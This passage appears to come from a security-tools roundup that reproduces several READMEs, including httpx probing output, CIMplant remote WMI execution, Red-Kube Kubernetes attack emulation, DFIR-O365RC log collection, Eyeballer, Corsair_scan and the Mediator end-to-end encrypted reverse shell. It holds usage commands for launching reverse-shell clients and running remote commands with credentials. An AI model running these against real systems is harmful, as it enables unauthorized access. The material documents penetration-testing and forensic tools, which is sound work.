
https://173.0.84.29
https://173.0.84.43
https://173.0.84.31
https://173.0.84.44
https://173.0.84.12
https://173.0.84.4
https://173.0.84.36
https://173.0.84.45
https://173.0.84.14
https://173.0.84.25
https://173.0.84.46
https://173.0.84.24
https://173.0.84.32
https://173.0.84.9
https://173.0.84.13
https://173.0.84.6
https://173.0.84.16
https://173.0.84.34

Running httpx with subfinder
subfinder -d hackerone.com -silent | httpx -title -content-length -status-code -silent

https://mta-sts.forwarding.hackerone.com [404] [9339] [Page not found · GitHub Pages]
https://mta-sts.hackerone.com [404] [9339] [Page not found · GitHub Pages]
https://mta-sts.managed.hackerone.com [404] [9339] [Page not found · GitHub Pages]
https://docs.hackerone.com [200] [65444] [HackerOne Platform Documentation]
https://www.hackerone.com [200] [54166] [Bug Bounty - Hacker Powered Security Testing | HackerOne]
https://support.hackerone.com [301] [489] []
https://api.hackerone.com [200] [7791] [HackerOne API]
https://hackerone.com [301] [92] []
https://resources.hackerone.com [301] [0] []

Notes
  • As default, httpx checks for HTTPS probe and fall-back to HTTP only if HTTPS is not reachable.
  • For printing both HTTP/HTTPS results, no-fallback flag can be used.
  • Custom scheme for ports can be defined, for example -ports http:443,http:80,https:8443
  • vhost, http2, pipeline, ports, csp-probe, tls-probe and path are unique flag with different probes.
  • Unique flags should be used for specific use cases instead of running them as default with other flags.
  • When using json flag, all the information (default probes) included in the JSON output.

Thanks

httpx is made by the projectdiscovery team. Community contributions have made the project what it is. See the Thanks.md file for more details. Do also check out these similar awesome projects that may fit in your workflow:

Probing feature is inspired by @tomnomnom/httprobe work



CIMplant - C# Port Of WMImplant Which Uses Either CIM Or WMI To Query Remote Systems

$
0
0


C# port of WMImplant which uses either CIM or WMI to query remote systems. It can use provided credentials or the current user's session.

Note: Some commands will use PowerShell in combination with WMI, denoted with ** in the --show-commands command.


Introduction

CIMplant is a C# rewrite and expansion on @christruncer's WMImplant. It allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using WindowsManagement Instrumentation, WMI, or Common Interface Model, CIM ; well more accurately Windows Management Infrastructure, MI. CIMplant requires local administrator permissions on the target system.


Setup:

It's probably easiest to use the built version under Releases, just note that it is compiled in Debug mode. If you want to build the solution yourself, follow the steps below.

  1. Load CIMplant.sln into Visual Studio
  2. Go to Build at the top and then Build Solution if no modifications are wanted

Usage
CIMplant.exe --help
CIMplant.exe --show-commands
CIMplant.exe --show-examples
CIMplant.exe -s [remote IP address] -c cat -f c:\users\user\desktop\file.txt
CIMplant.exe -s [remote IP address] -u [username] -d [domain] -p [password] -c cat -f c:\users\test\desktop\file.txt
CIMplant.exe -s [remote IP address] -u [username] -d [domain] -p [password] -c command_exec --execute "dir c:\\"

Some Helpful Commands



Important Files

  1. Program.cs

This is the brains of the operation, the driver for the program.

  1. Connector.cs

This is where the initial CIM/WMI connections are made and passed to the rest of the application

  1. ExecuteWMI.cs

All function code for the WMI commands

  1. ExecuteCIM.cs

All function code for the CIM (MI) commands


Detection

Of course, the first thing we'll want to be aware of is the initial WMI or CIM connection. In general, WMI uses DCOM as a communication protocol whereas CIM uses WSMan (or, WinRM). This can be modified for CIM, and is in CIMplant, but let's just go over the default values for now. For DCOM, the first thing we can do is look for initial TCP connections over port 135. The connecting and receiving systems will then decide on a new, very high port to use so that will vary drastically. For WSMan, the initial TCP connection is over port 5985.

Next, you'll want to look at the Microsoft-Windows-WMI-Activity/Trace event log in the Event Viewer. Search for Event ID 11 and filter on the IsLocal property if possible. You can also look for Event ID 1295 within the Microsoft-Windows-WinRM/Analytic log.

Finally, you'll want to look for any modifications to the DebugFilePath property with the Win32_OSRecoveryConfiguration class. More detailed information about detection can be found at Part 1 of our blog series here: CIMplant Part 1: Detection of a C# Implementation of WMImplant



Red-Kube - Red Team K8S Adversary Emulation Based On Kubectl

$
0
0


Red Kube is a collection of kubectl commands written to evaluate the security posture of Kubernetes clusters from the attacker's perspective.

The commands are either passive for data collection and information disclosure or active for performing real actions that affect the cluster.

The commands are mapped to MITRE ATT&CK Tactics to help get a sense of where we have most of our gaps and prioritize our findings.

The current version is wrapped with a python orchestration module to run several commands in one run based on different scenarios or tactics.

Please use with care as some commands are active and actively deploy new containers or change the role-based access control configuration.

Warning: You should NOT use red-kube commands on a Kubernetes cluster that you don't own!


Prerequisites:

python3 requirements

pip3 install -r requirements.txt

kubectl (Ubuntu / Debian)

sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl
sudo curl -fsSLo /usr/share/keyrings/kubernetes-archive-keyring.gpg https://packages.cloud.google.com/apt/doc/apt-key.gpg
echo "deb [signed-by=/usr/share/keyrings/kubernetes-archive-keyring.gpg] https://apt.kubernetes.io/ kubernetes-xenial main" | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo apt-get update
sudo apt-get install -y kubectl

kubectl (Red Hat based)

cat <<EOF > /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
EOF
yum install -y kubectl

jq

sudo apt-get update -y
sudo apt-get install -y jq

Usage
usage: python3 main.py [-h] [--mode active/passive/all] [--tactic TACTIC_NAME] [--show_tactics] [--cleanup]

required arguments:
--mode run kubectl commands which are active / passive / all modes
--tactic choose tactic

other arguments:
-h --help show this help message and exit
--show_tactics show all tactics

Commands by MITRE ATT&CK Tactics
TacticCount
Reconnaissance2
Initial Access0
Execution0
Persistence2
Privilege Escalation4
Defense Evasion1
Credential Access8
Discovery15
Lateral Movement0
Collection1
Command and Control2
Exfiltration1
Impact0

Webinars

1 First Workshop with Lab01 and Lab02 Webinar Link

2 Second Workshop with Lab03 and Lab04 Webinar Link


Presentations

BlackHat Asia 2021


Q&A

Why choosing kubectl and not using the kubernetes api in python?

When performing red team assessments and adversary emulations, the quick manipulations and tweaks for the tools used in the arsenal are critical.

The ability to run such assessments and combine the k8s attack techniques based on kubectl and powerful Linux commands reduces the time and effort significantly.


Contact Us

This research was held by Lightspin's Security Research Team. For more information, contact us at support@lightspin.io.



DFIR-O365RC - PowerShell Module For Office 365 And Azure AD Log Collection

$
0
0


PowerShell module for Office 365 and Azure AD log collection


Module description

The DFIR-O365RC PowerShell module is a set of functions that allow the DFIR analyst to collect logs relevant for Office 365 Business Email Compromise investigations.

The logs are generated in JSON format and retrieved from two main data sources:

The two data sources can be queried from different endpoints:

Data source / EndpointHistoryPerformanceScopePre-requisites (OS or Azure)
Unified Audit Logs / Exchange Online PowerShell90 daysPoorAll Office 365 logs (Azure AD included)None
Unified Audit Logs / Office 365 Management API7 daysGoodAll Office 365 logs (Azure AD included)Azure App registration
Azure AD Logs / Azure AD PowerShell Preview30 daysGoodAzure AD sign-ins and audit events onlyWindows OS only
Azure AD Logs / MS Graph API30 daysGoodAzure AD sign-ins and audit events onlyNone

DFIR-O365RC is a forensic tool, its aim is not to monitor in real time your Office 365 infrastructure: Please use the Office 365 Management API if you want to analyze data in real time with a SIEM.

DFIR-O365RC will fetch data from:

  • Azure AD Logs using the MS Graph API because performance is good, history is 30 days and it works on PowerShell Core.
  • Unified Audit Logs using Exchange online PowerShell despite poor performance, history is 90 days and it works on PowerShell Core.

In case you are also investigating other Azure resources (IaaS, PaaS...) DFIR-O365RC can also fetch data from Azure Activity logs using the Azure Monitor RESTAPI. History is 90 days and it works on PowerShell Core.

As a result, DFIR-O365RC works also on Linux or Mac, as long as you have PowerShell Core and a browser in order to use device login.


Installation and pre-requisites

Clone the DFIR-O365RC repository. The tool works on PowerShell Desktop and PowerShell Core.

DFIR-O365 uses Jason Thompson's MSAL.PS and Boe Prox's PoshRSJob modules. To install them run the following commands:

Install-Module -Name MSAL.PS -RequiredVersion '4.21.0.1'
Install-Module -Name PoshRSJob -RequiredVersion '1.7.4.4'

If MSAL.PS module installation fails with the following message:

WARNING: The specified module ‘MSAL.PS’ with PowerShellGetFormatVersion ‘2.0’ is not supported by the current version of PowerShellGet. Get the latest version of the PowerShellGet module to install this module, ‘MSAL.PS’.

Update PowerShellGet with the following commands:

Install-PackageProvider Nuget -Force
Install-Module -Name PowerShellGet -Force

Once both modules are installed, launch a PowerShell prompt and locate your Powershell modules path with the following command:

PS> $env:PSModulePath

Copy the DFIR-O365RC directory in one of your modules path, for example on Windows:

  • %USERPROFILE%\Documents\WindowsPowerShell\Modules
  • %ProgramFiles%\WindowsPowerShell\Modules
  • %SYSTEMROOT%\system32\WindowsPowerShell\v1.0\Modules

Modules path examples on Linux:

  • /home/%USERNAME%/.local/share/powershell/Modules
  • /usr/local/share/powershell/Modules
  • /opt/microsoft/powershell/7/Modules

The DFIR-O365RC module is installed, restart the PowerShell prompt and load the module:

PS> Import-module DFIR-O365RC

Roles and license requirements

The user launching the tool should have the following roles:

  • Microsoft 365 role (portal.microsoft.com): Global reader
  • Exchange Online role (outlook.office365.com/ecp): View-Only Audit Logs

In order to retrieve Azure AD sign-ins logs with the MS Graph API you need at least one user with an Azure AD Premium P1 license. This license can be purchased at additional cost for a single user and is sometimes included in some license plans such as the Microsoft 365 Business Premium for small and medium-sized businesses.

If you need to retrieve also the Azure Activity logs you need the Log Analytics Reader role for the Azure subscription you are dumping the logs from.


Functions included in the module

The module has 6 functions:

Function nameData Source/HistoryPerformanceCompletenessDetails
Get-O365FullUnified audit logs/90 daysPoorAll unified audit logsA subset of logs per record type can be retrieved. Use only on a small tenant or a short period of time
Get-O365LightUnified audit logs/90 daysGoodA subset of unified audit logs onlyOnly a subset of operations considered of interest is retrieved.
Get-DefenderforO365Unified audit logs/90 daysGoodA subset of unified audit logs onlyRetrieves Defender for Office 365 related logs. Requires at least an E5 license or a license plan such as Microsoft Defender for Office 365 Plan or cloud app security
Get-AADLogsAzure AD Logs/30 daysGoodAll Azure AD logsGet tenant general information, all Azure sign-ins and audit logs. Azure AD sign-ins logs have more information than Azure AD logs retrieved via Unified audit logs.
Get-AADAppsAzure AD Logs/30 daysGoodA subset of Azure AD logs onlyGet Azure audit logs related to Azure applications and service principals only. The logs are enriched with application or service principal object information.
Get-AADDevicesAzure AD Logs/30 daysGoodA subset of Azure AD logs onlyGet Azure audit logs related to Azure AD joined or registered devices only. The logs are enriched with device object information.
Search-O365Unified audit logs/90 daysDepends on the queryA subset of unified audit logs onlySearch for activity related to a particular user, IP address or use the freetext query.
Get-AzRMActivityLogsAzure Activity logs/90 daysGoodAll Azure Activity logsGet all Azure activity logs for a given subscription or on every subscription the account running the function has access to

When querying Unified audit logs you are limited to 3 concurrent Exchange Online Powershell sessions. DFIR-O365RC will try to use all available sessions, please close any existing session before launching the log collection.

Each function as a comment based help which you can invoke with the get-help cmdlet.

#Display comment based help
PS> Get-help Get-O365Full
#Display comment based help with examples
PS> Get-help Get-O365Full -examples

Each function takes as a parameter a start date and an end date.

In order to retrieve Azure AD audit logs, sign-ins logs from the past 30 days and tenant information launch the following command:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-AADLogs -startdate $startdate -enddate $enddate

In order to retrieve enriched Azure AD audit logs related to Azure applications and service principals from the past 30 days launch the following command:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-AADApps -startdate $startdate -enddate $enddate

In order to retrieve enriched Azure AD audit logs related to Azure AD joined or registered devices from the past 30 days launch the following command:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-AADDevices -startdate $startdate -enddate $enddate

In order to retrieve all unified audit logs considered of interest from the past 30 days, except those related to Azure AD, which were already retrieved by the first command, launch:

$enddate = get-date
$startdate = $enddate.adddays(-30)
Get-O365Light -startdate $startdate -enddate $enddate -Operationsset "AllbutAzureAD"

In order to retrieve all unified audit logs considered of interest in a time window between -90 days and -30 days from now launch the following command:

$enddate = (get-date).adddays(-30)
$startdate = (get-date).adddays(-90)
Get-O365Light -StartDate $startdate -Enddate $enddate -Operationsset All

If mailbox audit is enabled and you want also to retrieve Mailboxloginoperations you can use the dedicated switch, on large tenants beware of a 50.000 events per day limit retrieval.

Get-O365Light -StartDate $startdate -Enddate $enddate -Operationsset All -MailboxLogin $true

If there are users with Enterprise 5 licenses or if there is a Microsoft Defender for Office 365 Plan you can retrieve Microsoft Defender related logs with the following command:

$enddate = get-date
$startdate = $enddate.adddays(-90)
Get-DefenderforO365 -StartDate $startdate -Enddate $enddate

To retrieve all Exchange Online related records from the unified audit logs between Christmas eve and Boxing day, beware that performance might be poor on a large tenant:

$startdate = get-date "12/24/2020"
$enddate = get-date "12/26/2020"
Get-O365Full -StartDate $startdate -Enddate $enddate -RecordSet ExchangeOnly

You can use the search function to look for IP addresses, activity related to specific users or perfrom a freetext search in the unified audit logs:

$enddate = get-date
$startdate = $enddate.adddays(-90)
#Retrieve events using the Exchange online Powershell AppId
Search-O365 -StartDate $startdate -Enddate $enddate -FreeText "a0c73c16-a7e3-4564-9a95-2bdf47383716"

#Search for events related to the X.X.X.X and Y.Y.Y.Y IP adresses, argument is a string separated by comas.
Search-O365 -StartDate $startdate -Enddate $enddate -IPAddresses "X.X.X.X,Y.Y.Y.Y"

#Retrieve events related to users user1@contoso.com and user2@constoso.com , argument is a system.array object
Search-O365 -StartDate $startdate -Enddate $enddate -UserIds "user1@contoso.com", "user2@contoso.com"

To retrieve all Azure Activity logs the account has access to launch the following command, available subscriptions will be displayed:

$enddate = get-date
$startdate = $enddate.adddays(-90)
Get-AzRMActivityLogs -StartDate $startdate -Enddate $enddate

When using PowerShell Core the authentication process will require a device code, you will need to use the devicecode parameter and launch your browser, open the https://microsoft.com/devicelogin URL and enter the code provided by the following message:

PS> Get-O365Light -StartDate $startdate -Enddate $enddate -DeviceCode:$true
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXX to authenticate.

Files generated

All files generated are in JSON format.

  • Get-AADApps creates a file named AADApps_%FQDN%.json in the azure_ad_apps folder where FQDN is the domain name part of the account used to collect the logs.
  • Get-AADDevices creates a file named AADDevices_%FQDN%.json in the azure_ad_devices folder.
  • Get-AADLogs creates folders named after the current date using the YYYY-MM-DD format in the azure_ad_signin folder, in each directory a file called AADSigninLog_%FQDN%_YYYY-MM-DD_HH-00-00.json is created for Azure AD sign-ins logs. A folder azure_ad_audit is also created and results are dumped in files named AADAuditLog_%FQDN%_YYYY-MM-DD.json for Azure AD audit logs. Finally a folder called azure_ad_tenant is created and the general tenant information written in a file named AADTenant_%FQDN%.json.
  • Get-AzRMActivityLogs creates folders named after the current date using the YYYY-MM-DD format in the azure_rm_activity folder, in each directory a file called AzRM_%FQDN%_%SubscriptionID%_YYYY-MM-DD_HH-00-00.json is created where %SubscriptionID% is the Azure subscription ID. A folder called azure_rm_subscriptions is created and each subscription information written in a file named AzRMsubscriptions_%FQDN%.json.
  • Get-O365Full creates folders named after the current date using the YYYY-MM-DD format in the O365_unified_audit_logs, in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD_HH-00-00.json is created.
  • Get-O365Light creates folders named after the current date using the YYYY-MM-DD format in the O365_unified_audit_logs, in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD.json is created.
  • Get-DefenderforO365 creates folders named after the current date using the YYYY-MM-DD format in the O365_unified_audit_logs, in each directory a file called UnifiedAuditLog_%FQDN%_YYYY-MM-DD_DefenderforO365.json is created.
  • Search-O365 creates folders named after the current date using the YYYY-MM-DD format in the O365_unified_audit_logs, in each directory a file called UnifiedAuditLog_%FQDN%YYYY-MM-DD%searchtype%.json is created, where searchtype can have the values "Freetext", "IPAddresses" or "UserIds".

Launching the various functions will generate a similar directory structure:

DFIR-O365_Logs
│ Get-AADApps.log
│ Get-AADDevices.log
│ Get-AADLogs.log
| Get-AzRMActivityLogs
│ Get-DefenderforO365.log
│ Get-O365Light.log
│ Search-O365.log
└───azure_ad_apps
│ │ AADApps_%FQDN%.json
└───azure_ad_audit
│ │ AADAuditLog_%FQDN%_YYYY-MM-DD.json
│ │ ...
└───azure_ad_devices
│ │ AADDevices_%FQDN%.json
└───azure_ad_signin
│ │
│ └───YYYY-MM-DD
│ │ AADSigninLog_%FQDN%_YYYY-MM-DD_HH-00-00.json
│ │ ...
└───azure_ad_tenant
│ │ AADTenant_%FQDN%.json
└───azure_rm_activity
│ │
│ └&#947 2;──YYYY-MM-DD
│ │ AzRM_%FQDN%_%SubscriptionID%_YYYY-MM-DD_HH-00-00.json
│ │ ...
└───azure_rm_subscriptions
│ │ AzRMsubscriptions_%FQDN%.json
└───O365_unified_audit_logs
│ │
│ └───YYYY-MM-DD
│ │ UnifiedAuditLog_%FDQN%_YYYY-MM-DD.json
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD_freetext.json
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD_DefenderforO365.json
│ │ UnifiedAuditLog_%FQDN%_YYYY-MM-DD_HH-00-00.json
│ │ ...



Eyeballer - Convolutional Neural Network For Analyzing Pentest Screenshots

$
0
0


Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.


Example Labels

Old-Looking Sites



Login Pages


Webapp


Custom 404's


Parked Domains


What the Labels Mean

Old-Looking Sites Blocky frames, broken CSS, that certain "je ne sais quoi" of a website that looks like it was designed in the early 2000's. You know it when you see it. Old websites aren't just ugly, they're also typically super vulnerable. When you're looking to hack into something, these websites are a gold mine.

Login Pages Login pages are valuable to pen testing, they indicate that there's additional functionality you don't currently have access to. It also means there's a simple follow-up process of credential enumeration attacks. You might think that you can set a simple heuristic to find login pages, but in practice it's really hard. Modern sites don't just use a simple input tag we can grep for.

Webapp This tells you that there is a larger group of pages and functionality available here that can serve as surface area to attack. This is in contrast to a simple login page, with no other functionality. Or a default IIS landing page which has no other functionality. This label should indicate to you that there is a web application here to attack.

Custom 404 Modern sites love to have cutesy custom 404 pages with pictures of broken robots or sad looking dogs. Unfortunately, they also love to return HTTP 200 response codes while they do it. More often, the "404" page doesn't even contain the text "404" in it. These pages are typically uninteresting, despite having a lot going on visually, and Eyeballer can help you sift them out.

Parked Domains Parked domains are websites that look real, but aren't valid attack surface. They're stand-in pages, usually devoid of any real functionality, consist almost entirely of ads, and are usually not run by our actual target. It's what you get when the domain specified is wrong or lapsed. Finding these pages and removing them from scope is really valuable over time.


Setup

Download required packages on pip:

sudo pip3 install -r requirements.txt

Or if you want GPU support:

sudo pip3 install -r requirements-gpu.txt

NOTE: Setting up a GPU for use with TensorFlow is way beyond the scope of this README. There's hardware compatibility to consider, drivers to install... There's a lot. So you're just going to have to figure this part out on your own if you want a GPU. But at least from a Python package perspective, the above requirements file has you covered.

Pretrained Weights

For the latest pretrained weights, check out the releases here on GitHub.

Training Data You can find our training data here:

https://www.dropbox.com/s/rpylhiv2g0kokts/eyeballer-3.0.zip?dl=1

There's two things you need from the training data:

  1. images/ folder, containing all the screenshots (resized down to 224x224)
  2. labels.csv that has all the labels
  3. bishop-fox-pretrained-v3.h5 A pretrained weights file you can use right out of the box without training.

Copy all three into the root of the Eyeballer code tree.


Predicting Labels

NOTE: For best results, make sure you screenshot your websites in a native 1.6x aspect ratio. IE: 1440x900. Eyeballer will scale the image down automatically to the right size for you, but if it's the wrong aspect ratio then it will squish in a way that will affect prediction performance.

To eyeball some screenshots, just run the "predict" mode:

eyeballer.py --weights YOUR_WEIGHTS.h5 predict YOUR_FILE.png

Or for a whole directory of files:

eyeballer.py --weights YOUR_WEIGHTS.h5 predict PATH_TO/YOUR_FILES/

Eyeballer will spit the results back to you in human readable format (a results.html file so you can browse it easily) and machine readable format (a results.csv file).


Performance

Eyeballer's performance is measured against an evaluation dataset, which is 20% of the overall screenshots chosen at random. Since these screenshots are never used in training, they can be an effective way to see how well the model is performing. Here are the latest results:

Overall Binary Accuracy93.52%
All-or-Nothing Accuracy76.09%

Overall Binary Accuracy is probably what you think of as the model's "accuracy". It's the chance, given any single label, that it is correct.

All-or-Nothing Accuracy is more strict. For this, we consider all of an image's labels and consider it a failure if ANY label is wrong. This accuracy rating is the chance that the model correctly predicts all labels for any given image.

LabelPrecisionRecall
Custom 40480.20%91.01%
Login Page86.41%88.47%
Webapp95.32%96.83%
Old Looking91.70%62.20%
Parked Domain70.99%66.43%

For a detailed explanation on Precision vs Recall, check out Wikipedia.


Training

To train a new model, run:

eyeballer.py train

You'll want a machine with a good GPU for this to run in a reasonable amount of time. Setting that up is outside the scope of this readme, however.

This will output a new model file (weights.h5 by default).


Evaluation

You just trained a new model, cool! Let's see how well it performs against some images it's never seen before, across a variety of metrics:

eyeballer.py --weights YOUR_WEIGHTS.h5 evaluate

The output will describe the model's accuracy in both recall and precision for each of the program's labels. (Including "none of the above" as a pseudo-label)



Corsair_Scan - A Security Tool To Test Cross-Origin Resource Sharing (CORS)

$
0
0


Corsair_scan is a security tool to test Cross-Origin Resource Sharing (CORS) misconfigurations. CORS is a mechanism that allows restricted resources on a web page to be requested from another domain outside the domain from which the first resource was served. If this is not properly configured, unauthorised domains can access to those resources.


What is CORS?

CORS is an HTTP-header based mechanism that allows a server to indicate any other origins (domain, scheme, or port) than its own from which a browser should permit loading of resources. It works by adding new HTTP headers that let servers describe which origins are permitted to read that information from a web browser.

CORS also relies on a mechanism by which browsers make a “preflight” request to the server hosting the cross-origin resource, in order to check that the server will permit the actual request. In that preflight, the browser sends headers that indicate the HTTP method and headers that will be used in the actual request.

The most common and problematic security issue when implementing CORS is the failure to validate/whitelist requestors. Too often, we see the value for Access-Control-Allow-Origin set to ‘*’.

Unfortunately, this is the default and as such allows any domain on the web to access that site’s resources.

As per the OWASP Application Security Verification Standard (ASVS), requirement 14.5.3 states

Verify that the Cross-Origin Resource Sharing (CORS) Access-Control-Allow-Origin header uses a strict allow list of trusted domains and subdomains to match against and does not support the "null" origin.


How Does corsair_scan work?

Corsair_scan works by resending a request (or list of requests) received as a parameter and then injecting a value in the Origin header. Depending on the content of the Access-Control-Allow-Origin header in the response to this request, we can assert if CORS configuration is correct or not. There are three scenarios that indicate that CORS is misconfigured:

  • The fake origin sent in the request is reflected in Access-Control-Allow-Origin
  • The value of Access-Control-Allow-Origin is *
  • The value of Access-Control-Allow-Origin is null

If CORS is found to be misconfigured, we check to see if the response contains the header Access-Control-Allow-Credentials, which means that the server allows credentials to be included on cross-origin requests.

Often, CORS configurations make use of wildcards, for example accepting anything under * example.com *. This means that the origin domain.com.evil.com will be accepted as it matches the given regex. To try and combat this, corsair_scan tests four scenarios:

  • Fake domain injection: We set the origin header to https://scarymonster.com, even if the original request doesn't have an origin header
  • If the original request has an origin header (for clarity, lets assume it is https://example.com):

How Do I Install It?

This project was developed with Python 3.9, but should work with any Python 3.x version.

corsair_scan has been designed to be used as a Python module , so the easiest way to install it is using pip.

pip3 install corsair_scan --user


How Do I Use It?

At the moment, corsair_scan is intended to be used as a Python package. However, we plan to release this as a command line tool (CLI) in future releases.

The method that performs the CORS scan is corsair_scan. Here is its definition:


corsair_scan

Receives a list of requests and a parameter to enable/disable certificate check in the request

Input:

  • data [List]: A list of requests. Each request is a dictionary that contains the relevant data for the request:

    • url_data [Dict]: This is a dictionary that contains all the relevant data for the request:
      • url [String]: This is the url where the request is sent
      • verb [String]: The verb for the request (get, post, patch, delete, options...)
      • params [String]: The body sent in the request (if any)
      • headers [Dict]: This is a dict with all the headers included in the request
  • verify [Boolean] [Default: True] : Sends this value to corsair_scan_single_url for each request

Output:

  • final_report [List]: Contains the full report for the test performed. If filter is set to true, it also adds a summary of the test to the report.
    • report [List]: List of detailed individual reports with the test performed
    • summary [Dict] : Summary of the issues detected in the scan

Example
import corsair_scan
url_data = {}
data = []
verb = 'GET'
url = 'https://example.com/'
params = 'user=user1&password=1234'
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-GB,en;q=0.5', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1',
'Origin': 'https://example.com',
'Host': 'example.com'}

url_data['verb'] = verb
url_data['url'] = url
url_data['params'] = params
url_data['headers'] = headers
data.append(url_data)

print (corsair_scan.corsair_scan(data, verify=True))

Response:

{'report': [{'fake_origin': {'Access-Control-Allow-Origin': 'https://scarymonster.com',
'Origin': 'https://scarymonster.com',
'credentials': True,
'error': False,
'misconfigured': True,
'status_code': 200},
'post-domain': {'Access-Control-Allow-Origin': 'https://example.com.scarymonster.com',
'Origin': 'https://example.com.scarymonster.com',
'credentials': True,
'error': False,
'misconfigured': True,
'status_code': 200},
'pre-domain': {'Access-Control-Allow-Origin': 'https://scarymonsterexample.com',
'Origin': ' https://scarymonsterexample.com',
'creden tials': True,
'error': False,
'misconfigured': True,
'status_code': 200},
'sub-domain': {'Access-Control-Allow-Origin': 'https://scarymonster.example.com',
'Origin': 'https://scarymonster.example.com',
'credentials': True,
'error': False,
'misconfigured': True,
'status_code': 200},
'url': 'https://example.com/',
'verb': 'GET'}],
'summary': {'error': [], 'misconfigured': [{'credentials': True,
'misconfigured_test': ['fake_origin',
'sub-domain',
'pre-domain',
'post-domain'],
'status_code': 200 ,
'url': 'https://domain.com',
'verb': 'GET'}]}}

Roadmap
  • Release corsair_scan as a CLI tool
  • Read url data from a text file
  • Improve reports format

Who Is Behind It?

Corsair_scan was developed by the Santander UK Security Engineering team who are:



Mediator - An Extensible, End-To-End Encrypted Reverse Shell With A Novel Approach To Its Architecture

$
0
0


Mediator is an end-to-end encrypted reverse shell in which the operator and the shell connect to a "mediator" server that bridges the connections. This removes the need for the operator/handler to set up port forwarding in order to listen for the connection. Mediator also allows you to create plugins to expand the functionality of the reverse shell.

You can run Mediator's scripts as standalone executables or you can import them for integration into other pentesting and incident response tools.


Architecture:

Inspired by end-to-end encrypted chat applications, Mediator takes a unique approach to the client/server model of a reverse shell. Mediator uses:

  1. A client reverse shell
  2. A client handler/operator
  3. A server that bridges the two connections

Reverse shells and handlers connect to the Mediator server with a connection key. The server listens on port 80 for handler connections and port 443 for reverse shell connections. When clients connect to the mediator, the server queues the clients according to their respective type and connection key. When both a reverse shell and an operator connect to the server with the same key, the server will bridge the two connections. From there, a key exchange is done between the two clients, and all communication between the reverse shell and operator is encrypted end-to-end. This ensures the server cannot snoop on the streams it is piping.


Plugins

Plugins allow you to add extra commands that can execute code on the operator's host, the target host, or both! Please refer to the README in the plugins directory for more information about plugins.


Instructions:

Server

The client scripts can be run on Windows or Linux, but you'll need to stand up the server (mediator.py) on a Linux host. The server is pure Python, so no dependencies need to be installed. You can either run the server script with

$ python3 mediator.py

or you can build a Docker image with the provided Dockerfile and run it in a container (make sure to publish ports 80 and 443).


Clients

You will need to install the dependencies found in requirements.txt) for the clients to work. You can do this with the following command:

$ pip3 install -r requirements.txt

See Tips and Reminders at the bottom for help on distributing the clients without worrying about dependencies.

The handler and the reverse shell can be used within other Python scripts or directly via the command line. In both cases, the clients can accept arguments for the server address and connection key. Usage of those arguments is described below.

Mediator server address

For Python script usage, the address of the mediator host is required upon instantiation:

Handler class

from handler import Handler

operator = Handler(mediatorHost="example.com")
operator.run()

WindowsRShell class

from windowsTarget import WindowsRShell

shell = WindowsRShell(mediatorHost="example.com")
shell.run()

If executing a client script directly from a shell, you can either hard code the address at the bottom of the script, or the server address can be specified as an argument with the -s or --server flag:

handler.py

$ python3 handler.py -s example.com

windowsTarget.py

> python windowsTarget.py -s example.com

Connection key

When two handlers or two reverse shells connect to the mediator server with the same connection key, only the first connection is queued awaiting its match. Until the queued connection either times out (30 seconds) or matches with a counterpart connection, all other clients of the same type trying to connect with the same connection key will be dropped.

It is important to make sure each handler is using a unique connection key to avoid a race condition resulting in the wrong shell being given to an operator.

Only keys with the prefix "#!ConnectionKey_" will be accepted by the server. The default connection key is "#!ConnectionKey_CHANGE_ME!!!".

To change the connection key for Python script usage, the connection key can optionally be supplied upon instantiation:

Handler class

from handler import Handler

operator = Handler(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key")
operator.run()

LinuxRShell class

from linuxTarget import LinuxRShell

shell = LinuxRShell(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key")
shell.run()

If executing a client script directly from a shell, you can either hard code the connection key at the bottom of the script, or the connection key can be specified as an argument with the -c or --connection-key flag:

handler.py

$ python3 handler.py -s example.com -c '#!ConnectionKey_secret_key'

windowsTarget.py

> python windowsTarget.py -s example.com -c '#!ConnectionKey_secret_key'

Tips and Reminders:
  • REMINDER: handlers and reverse shells will not be bridged together unless they connect to the mediator server using the same connection key within 30 seconds of each other.
  • TIP: You can easily create an exe for windowsTarget.py with pyinstaller using the --onefile flag
  • TIP: For security, you should use a randomly generated connection key for each session. If a malicious party learns your connection key and spams the operator port with it, your operator client will be unable to connect due to the server not allowing duplicate connnections, and they will be connected to your target's shell.



Msldap - LDAP Library For Auditing MS AD

$
0
0


msldap

LDAP library for MS AD


Documentation

Awesome documentation here!


Features
  • Comes with a built-in console LDAP client
  • All parameters can be conrolled via a conveinent URL (see below)
  • Supports integrated windows authentication (SSPI) both with NTLM and with KERBEROS
  • Supports channel binding (for ntlm and kerberos not SSPI)
  • Supports encryption (for NTLM/KERBEROS/SSPI)
  • Supports LDAPS (TODO: actually verify certificate)
  • Supports SOCKS5 proxy withot the need of extra proxifyer
  • Minimal footprint
  • A lot of pre-built queries for convenient information polling
  • Easy to integrate to your project
  • No testing suite

Installation

Via GIT
python3 setup.py install
OR
pip install msldap


Prerequisites
  • winsspi module. For windows only. This supports SSPI based authentication.
  • asn1crypto module. Some LDAP queries incorporate ASN1 strucutres to be sent on top of the ASN1 transport XD
